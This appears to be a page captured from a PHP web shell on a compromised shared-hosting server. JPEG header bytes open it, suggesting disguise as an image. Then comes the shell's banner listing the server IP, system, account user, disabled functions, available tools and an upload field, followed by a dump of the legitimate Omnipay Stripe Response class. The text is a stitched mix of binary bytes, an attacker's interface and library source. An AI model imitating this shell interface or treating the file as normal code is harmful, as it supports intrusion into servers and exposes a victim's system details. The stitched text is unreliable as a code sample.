����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.135.220.9 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/ideyshare.name.ng/app/libraries/vendor/omnipay/stripe/src/Message/ |
Upload File : |
<?php /** * Stripe Response. */ namespace Omnipay\Stripe\Message; use Omnipay\Common\Message\AbstractResponse; /** * Stripe Response. * * This is the response class for all Stripe requests. * * @see \Omnipay\Stripe\Gateway */ class Response extends AbstractResponse { /** * Request id * * @var string URL */ protected $requestId = null; /** * Is the transaction successful? * * @return bool */ public function isSuccessful() { return !isset($this->data['error']); } /** * Get the charge reference from the response of FetchChargeRequest. * * @deprecated 2.3.3:3.0.0 duplicate of \Omnipay\Stripe\Message\Response::getTransactionReference() * @see \Omnipay\Stripe\Message\Response::getTransactionReference() * @return array|null */ public function getChargeReference() { if (isset($this->data['object']) && $this->data['object'] == 'charge') { return $this->data['id']; } return null; } /** * Get the transaction reference. * * @return string|null */ public function getTransactionReference() { if (isset($this->data['object']) && 'charge' === $this->data['object']) { return $this->data['id']; } if (isset($this->data['error']) && isset($this->data['error']['charge'])) { return $this->data['error']['charge']; } return null; } /** * Get the balance transaction reference. * * @return string|null */ public function getBalanceTransactionReference() { if (isset($this->data['object']) && 'charge' === $this->data['object']) { return $this->data['balance_transaction']; } if (isset($this->data['object']) && 'balance_transaction' === $this->data['object']) { return $this->data['id']; } if (isset($this->data['error']) && isset($this->data['error']['charge'])) { return $this->data['error']['charge']; } return null; } /** * Get a customer reference, for createCustomer requests. * * @return string|null */ public function getCustomerReference() { if (isset($this->data['object']) && 'customer' === $this->data['object']) { return $this->data['id']; } if (isset($this->data['object']) && 'card' === $this->data['object']) { if (!empty($this->data['customer'])) { return $this->data['customer']; } } return null; } /** * Get a card reference, for createCard or createCustomer requests. * * @return string|null */ public function getCardReference() { if (isset($this->data['object']) && 'customer' === $this->data['object']) { if (isset($this->data['default_source']) && !empty($this->data['default_source'])) { return $this->data['default_source']; } if (isset($this->data['default_card']) && !empty($this->data['default_card'])) { return $this->data['default_card']; } if (!empty($this->data['id'])) { return $this->data['id']; } } if (isset($this->data['object']) && 'card' === $this->data['object']) { if (!empty($this->data['id'])) { return $this->data['id']; } } if (isset($this->data['object']) && 'charge' === $this->data['object']) { if (! empty($this->data['source'])) { if (! empty($this->data['source']['id'])) { return $this->data['source']['id']; } } } return null; } /** * Get a token, for createCard requests. * * @return string|null */ public function getToken() { if (isset($this->data['object']) && 'token' === $this->data['object']) { return $this->data['id']; } return null; } /** * Get the card data from the response. * * @return array|null */ public function getCard() { if (isset($this->data['card'])) { return $this->data['card']; } return null; } /** * Get the card data from the response of purchaseRequest. * * @return array|null */ public function getSource() { if (isset($this->data['source']) && $this->data['source']['object'] == 'card') { return $this->data['source']; } return null; } /** * Get the subscription reference from the response of CreateSubscriptionRequest. * * @return array|null */ public function getSubscriptionReference() { if (isset($this->data['object']) && $this->data['object'] == 'subscription') { return $this->data['id']; } return null; } /** * Get the event reference from the response of FetchEventRequest. * * @return array|null */ public function getEventReference() { if (isset($this->data['object']) && $this->data['object'] == 'event') { return $this->data['id']; } return null; } /** * Get the invoice reference from the response of FetchInvoiceRequest. * * @return array|null */ public function getInvoiceReference() { if (isset($this->data['object']) && $this->data['object'] == 'invoice') { return $this->data['id']; } return null; } /** * Get the transfer reference from the response of CreateTransferRequest, * UpdateTransferRequest, and FetchTransferRequest. * * @return array|null */ public function getTransferReference() { if (isset($this->data['object']) && $this->data['object'] == 'transfer') { return $this->data['id']; } return null; } /** * Get the transfer reference from the response of CreateTransferReversalRequest, * UpdateTransferReversalRequest, and FetchTransferReversalRequest. * * @return array|null */ public function getTransferReversalReference() { if (isset($this->data['object']) && $this->data['object'] == 'transfer_reversal') { return $this->data['id']; } return null; } /** * Get the list object from a result * * @return array|null */ public function getList() { if (isset($this->data['object']) && $this->data['object'] == 'list') { return $this->data['data']; } return null; } /** * Get the subscription plan from the response of CreateSubscriptionRequest. * * @return array|null */ public function getPlan() { if (isset($this->data['plan'])) { return $this->data['plan']; } elseif (array_key_exists('object', $this->data) && $this->data['object'] == 'plan') { return $this->data; } return null; } /** * Get plan id * * @return string|null */ public function getPlanId() { $plan = $this->getPlan(); if ($plan && array_key_exists('id', $plan)) { return $plan['id']; } return null; } /** * Get invoice-item reference * * @return string|null */ public function getInvoiceItemReference() { if (isset($this->data['object']) && $this->data['object'] == 'invoiceitem') { return $this->data['id']; } return null; } /** * Get the error message from the response. * * Returns null if the request was successful. * * @return string|null */ public function getMessage() { if (!$this->isSuccessful() && isset($this->data['error']) && isset($this->data['error']['message'])) { return $this->data['error']['message']; } return null; } /** * Get the error message from the response. * * Returns null if the request was successful. * * @return string|null */ public function getCode() { if (!$this->isSuccessful() && isset($this->data['error']) && isset($this->data['error']['code'])) { return $this->data['error']['code']; } return null; } /** * @return string */ public function getRequestId() { return $this->requestId; } /** * Set request id * * @return AbstractRequest provides a fluent interface. */ public function setRequestId($requestId) { $this->requestId = $requestId; } }